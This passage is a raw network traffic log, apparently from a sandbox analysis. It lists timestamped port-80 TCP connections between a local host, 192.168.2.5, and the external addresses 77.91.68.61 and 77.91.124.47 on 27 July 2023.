Jul 27, 2023 01:34:07.195527077 CEST	49957	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.196942091 CEST	49958	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.239761114 CEST	80	49957	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.239857912 CEST	49957	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.241458893 CEST	80	49958	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.242244959 CEST	49958	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.244652987 CEST	49958	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.289239883 CEST	80	49958	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.292295933 CEST	80	49958	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.292525053 CEST	49958	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.410168886 CEST	49958	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.411036968 CEST	49959	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.455092907 CEST	80	49958	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.455143929 CEST	80	49959	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.455199003 CEST	49958	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.455256939 CEST	49959	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.456096888 CEST	49959	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.500041008 CEST	80	49959	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.502933979 CEST	80	49959	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.505188942 CEST	49959	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.611402035 CEST	49959	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.613758087 CEST	49960	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.655514002 CEST	80	49959	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.656260967 CEST	49959	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.658524990 CEST	80	49960	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.658655882 CEST	49960	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.660564899 CEST	49960	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.705313921 CEST	80	49960	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.708261013 CEST	80	49960	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.708376884 CEST	49960	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.828434944 CEST	49960	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.830627918 CEST	49961	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.873466015 CEST	80	49960	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.873583078 CEST	49960	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.874963045 CEST	80	49961	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.875125885 CEST	49961	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.875684023 CEST	49961	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.920033932 CEST	80	49961	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.922991991 CEST	80	49961	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.923094988 CEST	49961	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.028450012 CEST	49961	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.034652948 CEST	49962	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.073024988 CEST	80	49961	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.073156118 CEST	49961	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.079108953 CEST	80	49962	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.079253912 CEST	49962	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.082505941 CEST	49962	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.126925945 CEST	80	49962	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.130517006 CEST	80	49962	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.130716085 CEST	49962	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.250014067 CEST	49962	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.250700951 CEST	49963	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.294595957 CEST	80	49962	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.294748068 CEST	49962	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.295037985 CEST	80	49963	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.295152903 CEST	49963	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.298031092 CEST	49963	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.342566967 CEST	80	49963	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.345679998 CEST	80	49963	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.348295927 CEST	49963	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.457453966 CEST	49963	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.458461046 CEST	49964	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.501867056 CEST	80	49963	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.502326012 CEST	49963	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.503055096 CEST	80	49964	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.503155947 CEST	49964	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.504359007 CEST	49964	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.549031019 CEST	80	49964	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.552969933 CEST	80	49964	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.553517103 CEST	49964	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.676628113 CEST	49964	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.677534103 CEST	49965	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.721354961 CEST	80	49964	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.722234011 CEST	49964	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.722419024 CEST	80	49965	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.722680092 CEST	49965	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.723388910 CEST	49965	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.768158913 CEST	80	49965	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.772349119 CEST	80	49965	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.773601055 CEST	49965	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.890717983 CEST	49965	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.891433954 CEST	49966	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.935611010 CEST	80	49965	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.935777903 CEST	80	49966	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.935892105 CEST	49965	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.935931921 CEST	49966	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.939282894 CEST	49966	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:08.984143972 CEST	80	49966	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.988142967 CEST	80	49966	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:08.988282919 CEST	49966	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.099886894 CEST	49966	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.100547075 CEST	49967	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.144088984 CEST	80	49966	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.144606113 CEST	80	49967	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.144697905 CEST	49966	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.144738913 CEST	49967	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.145159960 CEST	49967	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.189011097 CEST	80	49967	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.193471909 CEST	80	49967	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.194381952 CEST	49967	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.329330921 CEST	49967	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.330372095 CEST	49968	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.373394012 CEST	80	49967	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.374640942 CEST	80	49968	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.374806881 CEST	49967	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.374864101 CEST	49968	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.375286102 CEST	49968	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.419548988 CEST	80	49968	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.423567057 CEST	80	49968	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.424451113 CEST	49968	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.528531075 CEST	49968	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.536643028 CEST	49969	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.572937965 CEST	80	49968	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.573024035 CEST	49968	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.581347942 CEST	80	49969	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.581449032 CEST	49969	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.583251953 CEST	49969	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.628175974 CEST	80	49969	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.633275986 CEST	80	49969	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.633348942 CEST	49969	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.751357079 CEST	49969	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.752161026 CEST	49970	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.795989990 CEST	80	49969	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.796066999 CEST	49969	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.796078920 CEST	80	49970	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.796164989 CEST	49970	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.799637079 CEST	49970	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.843812943 CEST	80	49970	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.848185062 CEST	80	49970	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.848269939 CEST	49970	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.950582027 CEST	49970	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.952328920 CEST	49971	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.994575977 CEST	80	49970	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.995987892 CEST	49970	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.996615887 CEST	80	49971	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:09.997360945 CEST	49971	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:09.997852087 CEST	49971	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.042045116 CEST	80	49971	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.045610905 CEST	80	49971	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.046017885 CEST	49971	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.170078039 CEST	49971	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.171010971 CEST	49972	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.214502096 CEST	80	49971	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.214723110 CEST	49971	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.214988947 CEST	80	49972	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.215097904 CEST	49972	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.218684912 CEST	49972	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.264194965 CEST	80	49972	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.362344027 CEST	80	49972	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.362420082 CEST	49972	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.468081951 CEST	49972	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.469290972 CEST	49973	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.512180090 CEST	80	49972	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.512312889 CEST	49972	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.513515949 CEST	80	49973	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.513653040 CEST	49973	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.514075041 CEST	49973	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.558300972 CEST	80	49973	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.659008980 CEST	80	49973	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.659090996 CEST	49973	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.771292925 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:34:10.773659945 CEST	49973	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.774375916 CEST	49974	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.817320108 CEST	80	49723	77.91.124.47	192.168.2.5
Jul 27, 2023 01:34:10.817378044 CEST	49723	80	192.168.2.5	77.91.124.47
Jul 27, 2023 01:34:10.819230080 CEST	80	49973	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.819299936 CEST	49973	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.819731951 CEST	80	49974	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.819808960 CEST	49974	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.820462942 CEST	49974	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:10.865968943 CEST	80	49974	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.928301096 CEST	80	49974	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:10.928366899 CEST	49974	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.044461966 CEST	49974	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.045314074 CEST	49975	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.088809967 CEST	80	49974	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.088896036 CEST	49974	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.089135885 CEST	80	49975	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.089221001 CEST	49975	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.118577003 CEST	49975	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.162683964 CEST	80	49975	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.166440964 CEST	80	49975	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.166577101 CEST	49975	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.402853966 CEST	49975	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.404700994 CEST	49976	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.448836088 CEST	80	49975	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.449542999 CEST	49975	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.454612970 CEST	80	49976	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.454734087 CEST	49976	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.479568958 CEST	49976	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.524451017 CEST	80	49976	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.528609037 CEST	80	49976	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.528692961 CEST	49976	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.655951977 CEST	49976	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.656853914 CEST	49977	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.700390100 CEST	80	49976	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.700484991 CEST	49976	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.701786995 CEST	80	49977	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.701877117 CEST	49977	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.705137014 CEST	49977	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.749696970 CEST	80	49977	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.754723072 CEST	80	49977	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.754792929 CEST	49977	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.880053043 CEST	49977	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.905996084 CEST	49978	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.925028086 CEST	80	49977	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.925101042 CEST	49977	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.950973034 CEST	80	49978	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:11.951073885 CEST	49978	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:11.953263998 CEST	49978	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.231282949 CEST	49978	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.276014090 CEST	80	49978	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:12.290754080 CEST	80	49978	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:12.290889025 CEST	49978	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.735230923 CEST	49978	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.735981941 CEST	49979	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.780555010 CEST	80	49978	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:12.780591965 CEST	80	49979	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:12.780658007 CEST	49978	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.780730963 CEST	49979	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.781689882 CEST	49979	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:12.826354980 CEST	80	49979	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:12.830709934 CEST	80	49979	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:12.830847025 CEST	49979	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.016379118 CEST	49979	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.031029940 CEST	49980	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.061172009 CEST	80	49979	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.061290979 CEST	49979	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.075898886 CEST	80	49980	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.076016903 CEST	49980	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.076467037 CEST	49980	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.121047020 CEST	80	49980	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.125946045 CEST	80	49980	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.126087904 CEST	49980	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.294461966 CEST	49980	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.295417070 CEST	49981	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.339236975 CEST	80	49980	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.339327097 CEST	49980	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.339663982 CEST	80	49981	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.339781046 CEST	49981	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.341654062 CEST	49981	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.386251926 CEST	80	49981	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.414489985 CEST	80	49981	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.414671898 CEST	49981	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.581767082 CEST	49981	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.582927942 CEST	49982	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.626257896 CEST	80	49981	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.626456022 CEST	49981	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.627660990 CEST	80	49982	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.627803087 CEST	49982	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.641700983 CEST	49982	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.686506987 CEST	80	49982	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.690120935 CEST	80	49982	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.690234900 CEST	49982	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.828196049 CEST	49982	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.829010010 CEST	49983	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.872924089 CEST	80	49982	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.872961044 CEST	80	49983	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.873018980 CEST	49982	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.873084068 CEST	49983	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.877954006 CEST	49983	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:14.922152042 CEST	80	49983	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.925879955 CEST	80	49983	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:14.926034927 CEST	49983	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.116924047 CEST	49983	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.117697954 CEST	49984	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.161130905 CEST	80	49983	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.161220074 CEST	49983	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.162318945 CEST	80	49984	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.162410975 CEST	49984	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.162938118 CEST	49984	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.207592010 CEST	80	49984	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.212131023 CEST	80	49984	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.212213993 CEST	49984	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.326162100 CEST	49984	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.331923008 CEST	49985	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.371659994 CEST	80	49984	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.371747971 CEST	49984	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.376343966 CEST	80	49985	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.376490116 CEST	49985	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.382893085 CEST	49985	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.427407980 CEST	80	49985	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.431612968 CEST	80	49985	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.431693077 CEST	49985	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.544476032 CEST	49985	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.545099974 CEST	49986	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.589157104 CEST	80	49985	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.589518070 CEST	80	49986	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.589587927 CEST	49985	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.589725018 CEST	49986	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.590035915 CEST	49986	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.634289026 CEST	80	49986	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.639098883 CEST	80	49986	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.640182018 CEST	49986	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.748883009 CEST	49986	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.749722958 CEST	49987	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.793345928 CEST	80	49986	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.793471098 CEST	49986	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.794101000 CEST	80	49987	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.794224024 CEST	49987	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.797283888 CEST	49987	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.841797113 CEST	80	49987	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.845347881 CEST	80	49987	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.845633984 CEST	49987	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.953191042 CEST	49987	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.953927994 CEST	49988	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.999031067 CEST	80	49987	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.999114990 CEST	49987	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.999234915 CEST	80	49988	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:15.999315977 CEST	49988	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:15.999753952 CEST	49988	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.044421911 CEST	80	49988	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.101803064 CEST	80	49988	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.101923943 CEST	49988	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.217716932 CEST	49988	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.219372034 CEST	49989	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.263427973 CEST	80	49989	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.264956951 CEST	80	49988	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.265103102 CEST	49988	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.265122890 CEST	49989	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.266437054 CEST	49989	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.310309887 CEST	80	49989	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.427861929 CEST	80	49989	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.427983999 CEST	49989	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.547352076 CEST	49989	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.553945065 CEST	49990	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.591305017 CEST	80	49989	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.591610909 CEST	49989	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.598740101 CEST	80	49990	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.598975897 CEST	49990	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.600465059 CEST	49990	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.645148993 CEST	80	49990	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.650218964 CEST	80	49990	77.91.68.61	192.168.2.5
